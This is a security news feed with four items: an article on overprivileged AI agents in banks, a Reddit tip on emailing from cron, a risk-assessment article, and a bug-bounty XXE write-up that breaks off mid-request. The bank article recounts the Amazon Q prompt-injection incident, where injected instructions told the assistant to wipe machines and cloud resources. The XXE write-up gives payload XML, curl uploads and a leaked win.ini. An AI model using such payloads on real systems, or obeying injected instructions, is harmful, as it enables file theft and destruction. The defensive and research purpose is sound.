<p>For two years, the AI a bank had to worry about mostly read and summarized. It drafted a customer email, pulled the gist of a credit memo, answered a relationship manager’s product question. The security questions were about disclosure: could the model see data it shouldn’t, could it leak that data in an answer. Redaction, output filtering and a human reading the response before it went anywhere were reasonable defenses.</p>



<p>Banks have moved past that, faster than most security programs have. The newer systems are agents. They don’t just answer; they act. An agent can pull a customer’s full transaction history, call a fraud-scoring service, adjust a limit or start a payment workflow, chaining several to finish a task with no human in between. Banks are among the most aggressive adopters of agentic AI, and they are pushing it into production faster than most security programs have kept pace with, which means they are also among the first to inherit the security problem that comes with it.</p>



<p>I’d put that problem in one phrase: overprivileged agents. The risk is no longer mainly what the model can see. It is what the agent is allowed to do inside systems that move money and hold regulated data.</p>



<p>This is no longer only a vendor’s warning. On April 30, 2026, the cyber agencies of the Five Eyes nations issued their first joint guidance on securing agentic AI, <a href="https://www.cyber.gov.au/business-government/secure-design/artificial-intelligence/careful-adoption-of-agentic-ai-services" rel="nofollow"><em>Careful Adoption of Agentic AI Services</em></a>. Six agencies signed it, two of them American (CISA and the NSA), alongside the lead agencies of the UK, Australia, Canada and New Zealand. It names privilege as the leading category of agentic risk and calls strict least privilege critical. When five governments coordinate on a single control, “best practice” becomes “expected practice” quickly. For a CISO, that moves the timeline up.</p>



<h2 class="wp-block-heading">What “too much authority” actually looks like</h2>



<p><a href="https://genai.owasp.org/llmrisk/llm062025-excessive-agency/" rel="nofollow">OWASP’s breakdown of the failure mode it calls excessive agency</a> maps cleanly onto a bank. <em>Excessive functionality</em> is an agent that can reach tools its task never needed, like a servicing agent that can also touch the payments API “just in case.” <em>Excessive permissions</em> is the right tool at the wrong scope: a reconciliation agent meant only to read, running with credentials that can also write. <em>Excessive autonomy </em>is a consequential action with no human in the loop: a fee reversed, a limit raised, a record changed, with nothing checking it. In practice these rarely appear alone; they compound.</p>



<p>The canonical example is mundane: an agent that reads one user’s data through an account that can see everyone’s. Translate that to a bank and it becomes an agent that can query every customer’s records to answer a question about one. That is the confused-deputy problem: the agent acts with the full authority of whatever identity it borrowed, while taking instructions from input an attacker may control.</p>



<h2 class="wp-block-heading">The mechanism, from a real incident</h2>



<p>The clearest public illustration so far comes from developer tooling rather than banking, but the mechanism is identical. In July 2025, an attacker used an over-scoped build token to slip malicious code into the open-source repository behind the Amazon Q Developer extension for VS Code, and it shipped in an official release (<a href="https://aws.amazon.com/security/security-bulletins/AWS-2025-015/" rel="nofollow">CVE-2025-8217</a>). The injected instructions told the AI assistant to wipe the local machine and delete cloud resources, down to specific S3 buckets and EC2 instances. The assistant could reach the local filesystem, the shell and AWS CLI tools, so structurally little stood between those instructions and real damage. What stopped them was a bug: the payload had a syntax error and never ran, and AWS found no customer environments affected. But the extension had been installed close to a million times, and the margin of safety was an accident.</p>



<p>The uncomfortable part is not that the agent was “hacked” in the usual sense. Had the attacker’s code been written correctly, the agent would have done exactly what the injected text told it, through a channel it trusted. The lesson: an agent with broad tools, write access and no approval gate is dangerous not only when someone steals its credentials, but any time someone can reach its input. And in a bank, reachable inputs sit everywhere an agent reads text it did not author: the memo line on a wire, a customer’s email in a dispute, a PDF uploaded to a loan file, a free-text field in a KYC record. This is indirect prompt injection, and the defenses for it are still partial. You cannot reliably solve it by instructing the agent to behave. You solve it by limiting what it is able to do, regardless of what it is told.</p>



<h2 class="wp-block-heading">What I keep seeing in deployments</h2>



<p>In the redaction-control work I’ve done with banks, the gap is rarely the model. It is that the agent gets wired to the data and the tools first; what it should be allowed to reach gets asked later, if at all.</p>



<p>One pattern recurs. A customer-servicing agent is wired into the core banking system to resolve account queries. To answer a simple question, it pulls the customer’s entire profile into context: full account number, date of birth, the complete transaction narrative. The task needed the last four digits and a list of recent transactions; the agent got everything, and each field then sat in prompts, logs and traces never scoped as sensitive data. The fix was not a sharper prompt. It was moving redaction to the retrieval boundary, so those fields were tokenized before they reached the agent, and scoping its read access to the one customer in the open case, not the whole table.</p>



<p>The other half of the problem is authority, not data. That same agent often shares a service account with a batch job, so it can write to fields well beyond a customer’s question. A dedicated identity with its own scoped, short-lived credentials is unglamorous work, but it is the difference between an agent that can read one case and one that can quietly change thousands.</p>



<h2 class="wp-block-heading">Extending controls banks already have</h2>



<p>The reassuring part is that banks are not starting from zero. Maker-checker, segregation of duties, four-eyes approval, least privilege, immutable audit: this is muscle memory in a bank. The work is extending it to a non-human actor that runs at machine speed.</p>



<p>Give the agent its own managed identity with narrowly scoped, short-lived credentials instead of letting it borrow an employee’s session. That is the direct fix for the confused-deputy problem, and what the joint guidance asks for. Scope tools per task and per resource: read versus write, and which accounts, not a blanket grant. Put irreversible, high-impact actions (moving money, changing entitlements, closing accounts, exporting bulk data) behind explicit approval gates, the human-in-the-loop the guidance reserves for high-cost actions. Redact at the data-access boundary, not only on the output: an agent that never retrieves the full account number cannot leak it downstream. And log the agent’s plan and every tool call, not just its final answer, because in an agentic system the damage lives in the actions.</p>



<h2 class="wp-block-heading">Why the clock is real</h2>



<p>Regulation has put a date on this. <a href="https://www.amsshardul.com/insight/enforcement-of-the-dpdp-act-and-notification-of-the-dpdp-rules/" rel="nofollow">India’s Digital Personal Data Protection Rules</a> were notified on November 14, 2025; the institutional provisions are already in force, and the substantive obligations (purpose limitation, data minimization, breach notification) take full effect in May 2027. Under that lens, an agent that can reach more customer data than its task requires is not only a security weakness; it is a data-minimization and accountability problem. Banks under GDPR or the EU AI Act face the same logic from a different statute.</p>



<p>One honest caveat: none of these laws actually names AI agents. Mapping their principles onto agent authorization is interpretation and prudent risk management, and each bank should work the specifics through with its own legal and compliance teams rather than treat the matter as settled.</p>



<h2 class="wp-block-heading">The trade-offs nobody has solved</h2>



<p>None of this is free. Approval gates work against the entire reason to deploy an agent: gate every action and you have rebuilt a slower manual process. Deciding which actions to gate, and which can run autonomously within tight scope, is a real design problem that turns on each workflow’s blast radius. Logging every plan and tool call produces audit volume most pipelines were not built for. Standards for agent identity are still immature, and the agent supply chain is itself an attack surface, as the Amazon Q case showed.</p>



<p>These are real tensions, not problems with clean answers. But the governance gap that the 2026 surveys keep finding is not a story of banks failing to deploy agents. It is controls trailing agents that are already running. The alternative, porting copilot-era defenses onto agents and trusting output filters, guards the wrong door.</p>



<p>Banks are hitting this first because they are ahead. That is also the opportunity: the institutions that settle their agent authorization model now, while deployments are still small enough to change course, will not just avoid the incident. They will set the pattern everyone else copies.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sending email from cron/bash without setting up a local MTA]]></title>
<description><![CDATA[Every time I spin up a new VM and want a cron job to email me — disk full, backup finished, cert expiring, I hit the same wall. To send mail from a script you either stand up a local MTA (postfix/exim/sendmail) and relay it somewhere, or wire up msmtp/ssmtp against an SMTP account. And half the t...]]></description>
<link>https://tsecurity.de/de/3650059/linux-tipps/sending-email-from-cronbash-without-setting-up-a-local-mta/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650059/linux-tipps/sending-email-from-cronbash-without-setting-up-a-local-mta/</guid>
<pubDate>Tue, 07 Jul 2026 00:55:26 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Every time I spin up a new VM and want a cron job to email me — disk full, backup finished, cert expiring, I hit the same wall. To send mail from a script you either stand up a local MTA (postfix/exim/sendmail) and relay it somewhere, or wire up msmtp/ssmtp against an SMTP account. And half the time the cloud provider blocks outbound port 25 (and increasingly 587), so even the lightweight path fights you.</p> <p>I've been using the Nylas CLI to skip all of that. Disclosure up front: I work on it, so take it with a grain of salt but the problem predates the tool and this is genuinely how I do it now.</p> <p>It's a single binary that sends over HTTPS (443), so there's no MTA to configure, no relay, and no dependence on port 25/587 being open.</p> <p>First-time setup on your workstation (creates/logs into an account and connects an email address):</p> <pre><code>nylas init </code></pre> <p>Then grab your API key to carry over to a server:</p> <pre><code>nylas auth token </code></pre> <p>Headless boxes don't have a desktop keyring, so pass the key by env var instead. <code>NYLAS_DISABLE_KEYRING=true</code> forces the encrypted file store instead of the keyring, and <code>NYLAS_API_KEY</code> overrides stored creds:</p> <pre><code>NYLAS_DISABLE_KEYRING=true NYLAS_API_KEY=nyk_v0_xxx nylas email list </code></pre> <p>Once that works, sending is one line you can drop in any script:</p> <pre><code>nylas email send \ --to me@example.com \ --subject "Backup done on $(hostname)" \ --body "Finished at $(date)" \ --yes </code></pre> <p>Since <code>--body</code> is just a string, pipe command output straight in:</p> <pre><code>nylas email send --to me@example.com \ --subject "Disk on $(hostname)" \ --body "$(df -h)" --yes </code></pre> <p>Crontab on a headless server — set the env once at the top so every job inherits it, then a nightly disk report at 7am:</p> <pre><code>NYLAS_DISABLE_KEYRING=true NYLAS_API_KEY=nyk_v0_xxx 0 7 * * * nylas email send --to me@example.com --subject "Disk $(hostname)" --body "$(df -h)" --yes </code></pre> <p>For a systemd timer, put the key in an <code>EnvironmentFile</code> instead so it's not sitting in the crontab.</p> <p>Honest tradeoffs, because this sub will (rightly) ask:</p> <ul> <li>It's a hosted API, not FOSS, and it needs a free account + API key. If you already have an SMTP account and unblocked ports, <strong>msmtp is lighter and fully open — just use that.</strong></li> <li>The win is specifically when you <em>don't</em> want to run an MTA, the box has 25/587 blocked, or you'd rather not park SMTP creds on the host. HTTPS-only egress covers a lot of locked-down cloud VMs.</li> <li>Mail lands from a real address (your Gmail/Outlook/domain), so it's less likely to get binned than mail from a fresh VM's postfix with no rDNS/SPF.</li> </ul> <p>How's everyone else handling cron/script notifications these days — local MTA + relay, msmtp, curl to an email API, or something else? Genuinely curious what the current default is.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/mqasimca"> /u/mqasimca </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1upcev3/sending_email_from_cronbash_without_setting_up_a/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1upcev3/sending_email_from_cronbash_without_setting_up_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[7 cyber risk assessment gotchas to avoid]]></title>
<description><![CDATA[A cyber risk assessment helps security teams identify, estimate, and prioritize potential threats and vulnerabilities to key enterprise digital and physical assets. Yet, despite its importance, many CISOs fall victim to several types of “gotchas” that prevent them from fully achieving their risk ...]]></description>
<link>https://tsecurity.de/de/3648003/it-security-nachrichten/7-cyber-risk-assessment-gotchas-to-avoid/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648003/it-security-nachrichten/7-cyber-risk-assessment-gotchas-to-avoid/</guid>
<pubDate>Mon, 06 Jul 2026 09:07:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A cyber risk assessment helps security teams identify, estimate, and prioritize potential threats and vulnerabilities to key enterprise digital and physical assets. Yet, despite its importance, many CISOs fall victim to several types of “gotchas” that prevent them from fully achieving their risk assessment goals.</p>



<p>An assessment should be an essential part of every organization’s overall cybersecurity strategy. The process helps security leaders understand risks to business objectives, evaluate the likelihood and impact of cyberattacks, and develop ways to mitigate the risks they uncover.</p>



<p>Here are the top seven mistakes security leaders should avoid to ensure risk assessment effectiveness.</p>



<h2 class="wp-block-heading">1. Going through the motions</h2>



<p>The biggest “gotcha” is treating cyber risk assessments as a preset checklist or control inventory instead of a decision tool tied to real business impact and threat scenarios, says Shirsendu Mondal, a cybersecurity researcher at the University of North Carolina.</p>



<p>“When assessments become all about checking boxes, they lose the ability to reflect how risk actually shows up in an environment,” he states. “The goal should be to inform decisions about where a business is truly exposed.”</p>



<p>Mondal assers that the best way to avoid the complacency trap is to take a context-driven approach. “Ask where the asset is, who can reach it, what data it touches, how important it is to operations, and what happens if it goes down,” he explains. “Risk should always be tied to business impact, not only technical findings.”</p>



<p>Mondal also recommends adding internal business leaders to security teams, including individuals in areas such as IT and operations, given that <a href="https://www.csoonline.com/article/4186984/6-security-leader-tips-for-mastering-business-risk.html">risk is more than a technical issue</a>.</p>



<h2 class="wp-block-heading">2. Sugarcoating results</h2>



<p>These are challenging times, so we must be honest with our stakeholders, says Pablo Riboldi, CISO at BairesDev, a nearshore software development firm.</p>



<p>“When results are discouraging, admit that the threat landscape has evolved much faster than the previous evaluation framework anticipated,” he says.</p>



<p>Instead of just handing over lists of vulnerabilities, you need to start presenting actual attack scenarios, Riboldi adds. “For example, by prioritizing the top three most critical business assets and conducting an in-depth assessment on them, you can show immediate value.”</p>



<h2 class="wp-block-heading">3. Falling short on the scope of your assessments</h2>



<p>CISOs often securitize document controls, check compliance boxes, and produce a risk register that claims everything looks absolutely fine, says Denis Calderone, CTO at cybersecurity services firm Suzu Labs. Yet nobody bothered to test whether those controls actually work or stopped to ask whether the scope of the assessment covered what really matters.</p>



<p>We see it all the time, Calderone says. “For instance, the assessment covers the production servers and the corporate network, but skips the old dev box in the corner, the third-party vendor portal nobody owns internally, or the API endpoint that was stood up for a project two years ago and never decommissioned.” Attackers don’t care about your scoping decisions, he says. “They look at the whole environment and find the thing you decided wasn’t worth assessing.”</p>



<p>AI is making the situation worse, Calderone says. Organizations are deploying AI tools, connecting them to internal systems, granting them access to sensitive data, and none of this is landing in the risk assessment. Meanwhile, AI agents are out there making API calls, accessing databases, and operating with credentials that nobody is tracking, he says.</p>



<p>“If your risk assessment was written before your organization started plugging AI into its workflows, it’s already stale,” Calderone warns.</p>



<h2 class="wp-block-heading">4. Overindexing on the risk register without checking your assumptions</h2>



<p>When the goal becomes completing the assessment instead of understanding actual exposure, the output is a document that satisfies auditors but misleads leadership, says Amit Basu, CIO and CISO at International Seaways, a major independent maritime shipping company that transports crude oil and refined petroleum products worldwide.</p>



<p>Such an attitude can create false confidence. Executives and board members see a completed risk register and assume the organization is protected, Basu says. Meanwhile, real threats go unaddressed because they didn’t fit neatly into the assessment framework. “The gotcha does not announce itself,” he explains. “It hides inside a green dashboard.”</p>



<p>A risk assessment is only as good as the assumptions that lie underneath it, Basu observes. “Document those assumptions explicitly and review them whenever your business changes, when the threat landscape shifts, or when an incident exposes a gap,” he advises. “The assessment is not a finished product — it’s a living input to an ongoing conversation between security and the business.”</p>



<h2 class="wp-block-heading">5. Failing to link risk with business impact</h2>



<p>Ignoring or downplaying the <a href="https://www.csoonline.com/article/4159317/cisos-reshape-their-roles-as-business-risk-strategists.html">connection between risk and business</a> makes it easier to de-prioritize or ignore problems, says Dan Moore, senior director of strategy and identity standards at FusionAuth, a customer identity and access management (CIAM) platform provider.</p>



<p>“As a result, it becomes difficult to communicate the real risks of breaches and other risks,” he states. “Worse yet, it gives security team members an excuse to complain about being misunderstood or not valued, which degrades team effectiveness.”</p>



<p>It’s important to be specific and targeted, Moore advises. “For instance, don’t say, ‘We have 95% patch compliance,’” he suggests. “Instead, talk about the risk unpatched systems pose to the business.” Some systems, such as legacy systems that aren’t connected to the internet or the core business, carry a lower risk than others, even if they have the same patch issues. “Acknowledge that fact and weigh your response.”</p>



<h2 class="wp-block-heading">6. Confusing compliance with real-world security</h2>



<p>Compliance alone doesn’t lead to good security, nor does it satisfy even the baseline requirements for effective protection, says Adriel Desautels, CEO of Netragard, a penetration testing and security advisory company.</p>



<p>Organizations tend to fall into this trap when they hire penetration testing firms that focus on compliance while promising top-tier services, Desautels says. “In truth, they deliver autonomous scanning masquerading as human-driven testing.”</p>



<p>The result is a false sense of security — a paper seatbelt, Desautels warns. “You feel protected, but when you crash, even at low speed, you get injured or worse,” he says. “Remember, every major breach in the past decade involved an organization that was compliant at the time of compromise.”</p>



<h2 class="wp-block-heading">7. Failing to fully understand risk</h2>



<p>Organizations often treat risk assessment as a vulnerability-cataloging exercise that includes finding gaps, counting severities, and passing the audit. Yet passing an audit and understanding risk are not the same thing, states Safi Raza, senior director of cyber security at Fusion Risk Management, a firm offering cloud-based operational resilience, business continuity, and risk management solutions.</p>



<p>Raza says that CISOs should focus on connecting technical risk signals to operational outcomes. “This includes understanding what services are affected, how disruption propagates, and what it means for revenue, customers, or regulatory obligations.”</p>



<p>Start by shifting from static assessments to continuous, context-driven risk visibility, Raza advises. “Risk needs to be understood not just technically, but in terms of business impact and financial exposure,” he states.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The File That Answered Back — XXE Hidden in Cell A2]]></title>
<description><![CDATA[Most people know XXE. Few think to look for it inside a spreadsheet upload. But beneath every .xlsx is really a ZIP archive full of XML, and the parser reading it doesn’t always know where to stop. This is the writeup of finding one that didn’t, and what it quietly handed back.The WallThe first t...]]></description>
<link>https://tsecurity.de/de/3647966/hacking/the-file-that-answered-back-xxe-hidden-in-cell-a2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647966/hacking/the-file-that-answered-back-xxe-hidden-in-cell-a2/</guid>
<pubDate>Mon, 06 Jul 2026 08:53:00 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*O29aTyx3TXMUBqM2BvQ3eA.png"></figure><blockquote>Most people know XXE. Few think to look for it inside a spreadsheet upload. But beneath every .xlsx is really a ZIP archive full of XML, and the parser reading it doesn’t always know where to stop. This is the writeup of finding one that didn’t, and what it quietly handed back.</blockquote><h3>The Wall</h3><p><em>The first thing I discovered wasn’t a vulnerability. It was a pattern.</em></p><p>Almost every asset was behind the same wall: Imperva, a web application firewall so common in enterprise deployments that you almost expect it now. On its own, a WAF isn’t an ending. It’s a conversation. You probe, you learn what it blocks and how, you find the shape of the rules. But this one was doing something specific that changed the entire character of the hunt. <em>It was blocking the word `DOCTYPE`.</em></p><p>Not entire payloads. Not suspicious looking XML structures. Just the presence of that one keyword, anywhere inside a POST body, was enough to return a 403 before the request ever touched any application. For context: `DOCTYPE` is the entry point for XML External Entity injection, the vulnerability class that lets you instruct an XML parser to read files off the server’s filesystem and hand them back to you. Without `DOCTYPE`, that entire attack surface disappears.</p><p>I confirmed this across the program’s Japanese portals, Korean WebLogic applications, Brazilian upload forms, AEM content management systems. Every time, a 403. The wall held.</p><h3>Learning to Read a Name</h3><p>The assets in one particular region felt different from the start. Different infrastructure, different cloud providers, different WAF signatures. And among them, one domain resolved to an Alibaba Cloud IP with an F5 load balancer behind it. No Imperva signature in any response header. No `incap` cookies. No bot-detection challenges. <em>The wall wasn’t there</em>.</p><p>What was there was a URL path I had to look at twice.</p><pre>/[REDACTED]/personal/CombineExcelUpload</pre><p>I’ve learned over time that endpoint names are often the most honest thing about a web application. Developers name things after what they do. And this name said three things at once: it accepts Excel files, it uploads them, and it <em>combines</em>, meaning it doesn’t just store the file, it reads it. The name of the endpoint was practically a confession of the vulnerability class.</p><p><strong>`CombineExcelUpload`. Server-side Excel processing. No authentication required.</strong></p><h3>The Thing About Spreadsheets</h3><p>Here is something that took me a while to really internalize, and now I think about it almost every time I see a file upload endpoint.</p><p><strong>An XLSX file is not a spreadsheet. Not at the parser level.</strong></p><p>An XLSX file is a ZIP archive containing a structured set of XML documents, defined by the Office Open XML (OOXML) standard. Open any `.xlsx` file with a ZIP extractor and you’ll find a whole internal world: folders, XML files, namespace declarations, hiding inside something that looks like a simple grid of numbers. The architecture looks like this:</p><pre>document.xlsx  (it's actually a ZIP)<br>│<br>├── [Content_Types].xml        ← declares MIME types for every internal part<br>├── _rels/<br>│   └── .rels                  ← links the package root to the workbook<br>└── xl/<br>    ├── workbook.xml            ← defines the workbook and its sheets<br>    ├── _rels/<br>    │   └── workbook.xml.rels   ← links the workbook to its sheet files<br>    └── worksheets/<br>        └── sheet1.xml          ← the actual cell data  ←  this is where we live</pre><p>Every file in that tree is XML. And the one that contains your cell values, `xl/worksheets/sheet1.xml`, is parsed by whichever XML library the server uses to read the spreadsheet.</p><p>If that library has external entity resolution enabled (which is the <strong>default</strong> in older .NET codebases, because the insecure behavior is the default, not the exception) then you can put something inside `sheet1.xml` that the parser was never meant to see. A declaration that says: *before you read this cell’s value, go open this file on the filesystem and put its contents here instead.*</p><p>The mechanism, written out plainly:</p><pre>XML parser reads sheet1.xml<br>  → encounters &lt;!DOCTYPE&gt; with external entity declaration<br>  → entity points to file:///C:/windows/win.ini<br>  → parser opens that file, reads its content<br>  → substitutes the content in place of &amp;xxe; inside the &lt;v&gt; tag<br>  → application reads the cell value<br>  → application returns it in the JSON response<br>  → the file content is now in your terminal</pre><p>That’s the whole chain. It uses the system exactly as designed, just with an input the designer never imagined someone would give it.</p><h3>The First Test: Does It Reflect?</h3><p>Before building any payload, I asked a simpler question. Does this endpoint actually read the cell content and return it? Or does it just accept the file and store it somewhere opaque?</p><p>I built the most minimal valid XLSX I could, nothing malicious, just a proper ZIP structure with a single cell containing the string `TestValue`, and uploaded it:</p><pre>curl -s -X POST "https://[REDACTED]/[REDACTED]/CombineExcelUpload" \<br>  -H "Referer: https://[REDACTED]/[REDACTED]/index" \<br>  -F "excelFile=@test.xlsx;type=application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"</pre><p>The response came back:</p><pre>{"uploadResult":"TestValue","responseCode":"1"}</pre><p>The endpoint read the cell. The endpoint returned the cell. The reflection was there.</p><p>That moment is quieter than you’d expect. There’s no alarm, no flashing light. Just a JSON field containing a word you put into a spreadsheet, coming back to you from a server you don’t control. It’s small. But it means everything, because it tells you the machinery is in place. The application is actively parsing the file and surfacing its contents. Which means if we control what the parser puts into that cell, we control what appears in the response.</p><h3>Building the Payload: From the Inside Out</h3><p>This is the part I want to be specific about, because it’s where most writeups wave their hand and say “craft a malicious XLSX.” The detail matters.</p><p>An XLSX file must be a valid ZIP archive with all five required files present, or the parser will reject it as malformed before it ever touches the worksheet XML. That means building the payload from scratch. Not modifying an existing spreadsheet, not using automated tools that produce broken structure, but assembling each piece by hand.</p><p>Here is what goes in each file :</p><blockquote><strong>`[Content_Types].xml`:</strong> the package manifest. Declares what MIME type each internal file represents. Without this, the parser doesn’t know what it’s looking at</blockquote><pre>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;<br>&lt;Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"&gt;<br>  &lt;Default Extension="rels"<br>    ContentType="application/vnd.openxmlformats-package.relationships+xml"/&gt;<br>  &lt;Default Extension="xml" ContentType="application/xml"/&gt;<br>  &lt;Override PartName="/xl/workbook.xml"<br>    ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/&gt;<br>  &lt;Override PartName="/xl/worksheets/sheet1.xml"<br>    ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/&gt;<br>&lt;/Types&gt;</pre><blockquote><strong>`_rels/.rels`:</strong> the root relationship file. Tells the parser the main document in this package is `xl/workbook.xml`.</blockquote><pre>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;<br>&lt;Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"&gt;<br>  &lt;Relationship Id="rId1"<br>    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument"<br>    Target="xl/workbook.xml"/&gt;<br>&lt;/Relationships&gt;</pre><blockquote><strong>`xl/workbook.xml`:</strong> the workbook definition. Declares one sheet named Sheet1, linked by relationship ID `rId1`.</blockquote><pre>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;<br>&lt;workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/ml/2006/main"<br>          xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"&gt;<br>  &lt;sheets&gt;<br>    &lt;sheet name="Sheet1" sheetId="1" r:id="rId1"/&gt;<br>  &lt;/sheets&gt;<br>&lt;/workbook&gt;</pre><blockquote><strong>`xl/_rels/workbook.xml.rels`:</strong> links `rId1` in the workbook to the actual sheet file.</blockquote><pre>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;<br>&lt;Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"&gt;<br>  &lt;Relationship Id="rId1"<br>    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet"<br>    Target="worksheets/sheet1.xml"/&gt;<br>&lt;/Relationships&gt;</pre><blockquote><strong>`xl/worksheets/sheet1.xml`: </strong>this is the payload. The `DOCTYPE` declaration at the top defines an external entity named `xxe` whose value is the contents of a file on the server. The `&amp;xxe;` reference inside the cell instructs the parser to resolve it.</blockquote><pre>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;<br>&lt;!DOCTYPE foo ..(Syntax -&gt; `[&lt;!` (medium Prevent the full code here*)) ENTITY xxe SYSTEM "file:///C:/windows/win.ini"&gt;]&gt;<br>&lt;worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/ml/2006/main"&gt;<br>  &lt;sheetData&gt;<br>    &lt;row r="1"&gt;&lt;c r="A1" t="str"&gt;&lt;v&gt;PolicyNo&lt;/v&gt;&lt;/c&gt;&lt;/row&gt;<br>    &lt;row r="2"&gt;&lt;c r="A2" t="str"&gt;&lt;v&gt;&amp;xxe;&lt;/v&gt;&lt;/c&gt;&lt;/row&gt;<br>  &lt;/sheetData&gt;<br>&lt;/worksheet&gt;</pre><p>A few choices here worth explaining. The `DOCTYPE foo` element name is arbitrary. It just needs to be a valid XML name. Cell A1 contains benign data to make the file look like a legitimate upload. Cell A2 is where the exfiltrated content will land. The `t=”str”` attribute declares it as a string type, which matters because numeric cell types get processed differently and can break the substitution.</p><p>The target file, `C:\windows\win.ini`, was chosen deliberately for the first proof: it’s world-readable on all Windows versions, it’s short, and critically, it contains **no XML special characters** (`&lt;`, `&gt;`, `&amp;`). Files that contain those characters break the outer XML document when substituted inline. The parser treats them as XML syntax rather than cell data, throws a parse error, and the read fails silently. `win.ini`, `system.ini`, and `hosts` are all safe targets for initial confirmation. `web.config` is not.</p><h3>The Exploit Time</h3><p>To turn the structure described above into a live test, I wrote a script that assembled all five XML files, packed them into a valid ZIP with an `.xlsx` extension, and posted the result to the upload endpoint in a single pass.</p><p>The four support files ([Content_Types].xml, .rels, workbook.xml, workbook.xml.rels) are static boilerplate that never change between reads. The only file that varies is `sheet1.xml`, where the target path gets injected at the `ENTITY` declaration:</p><pre>## Construct from Building the Payload segment<br>...<br>...<br>TARGET_FILE = "file:///C:/windows/win.ini"<br>sheet1 = f"""&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;<br>&lt;!DOCTYPE foo ..(Syntax -&gt; `[&lt;!` (medium Prevent the full code here*)) ENTITY xxe SYSTEM "{TARGET_FILE}"&gt;]&gt;<br>&lt;worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/ml/2006/main"&gt;<br>  &lt;sheetData&gt;<br>    &lt;row r="1"&gt;&lt;c r="A1" t="str"&gt;&lt;v&gt;PolicyNo&lt;/v&gt;&lt;/c&gt;&lt;/row&gt;<br>    &lt;row r="2"&gt;&lt;c r="A2" t="str"&gt;&lt;v&gt;&amp;xxe;&lt;/v&gt;&lt;/c&gt;&lt;/row&gt;<br>  &lt;/sheetData&gt;<br>&lt;/worksheet&gt;"""</pre><p>Once assembled and zipped, the upload is a standard multipart POST, indistinguishable at the transport layer from a legitimate spreadsheet. The server does the rest.</p><h3>Steps to Reproduce</h3><p><strong>Prerequisites:</strong> nothing. No account, no session token, no prior interaction with the application.</p><p><strong>Step 1.</strong> Build a valid XLSX ZIP structure containing the five files described in “Building the Payload,” with `sheet1.xml` carrying the `DOCTYPE` entity declaration targeting `file:///C:/windows/win.ini`.</p><p><strong>Step 2.</strong> POST the file to the upload endpoint:</p><pre>curl -s -X POST "https://[REDACTED]/[REDACTED]/CombineExcelUpload" \<br> -H "Referer: https://[REDACTED]/[REDACTED]/index" \<br> -F "excelFile=@OUR_PAYLOAD_FILE_CONSTRUCTED.xlsx;type=application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"</pre><p><strong>Step 3. </strong>Observe the response. The JSON will contain the contents of `C:\windows\win.ini` from the remote server. A successful read looks like:</p><pre>[*] Built: /tmp/OUR_PAYLOAD_FILE_CONSTRUCTED.xlsx<br>[*] Target: file:///C:/windows/win.ini<br>[*] Uploading...<br>[+] responseCode: 1<br>[+] File contents:<br>────────────────────────────────────────────────────────────<br>; for 16-bit app support<br>[fonts]<br>[extensions]<br>[mci extensions]<br>[files]<br>[Mail]<br>MAPI=1<br>────────────────────────────────────────────────────────────</pre><p><strong>Step 4.</strong> To read a different file, set `TARGET_FILE` at the top of the script and run again.</p><p><strong>What Came Back: The Full HTTP Evidence</strong></p><p>Three separate reads were performed to establish reproducibility, all confirmed within the same session.</p><p><strong>Read 1: `C:\windows\win.ini`</strong></p><pre>POST /[REDACTED]/CombineExcelUpload HTTP/1.1<br>Host: [REDACTED]<br>Referer: https://[REDACTED]/[REDACTED]/index<br>Origin: https://[REDACTED]<br>User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36<br>Accept: application/json, text/plain, */*<br>Content-Type: multipart/form-data; boundary=----xxeboundary<br><br>------xxeboundary<br>Content-Disposition: form-data; name="excelFile"; filename="malicious_bugbounty_1775798050.xlsx"<br>Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet<br>[Binary XLSX - xl/worksheets/sheet1.xml contains:]<br>&lt;!DOCTYPE foo ..(Syntax -&gt; `[&lt;!` (medium Prevent the full code here*)) ENTITY xxe SYSTEM 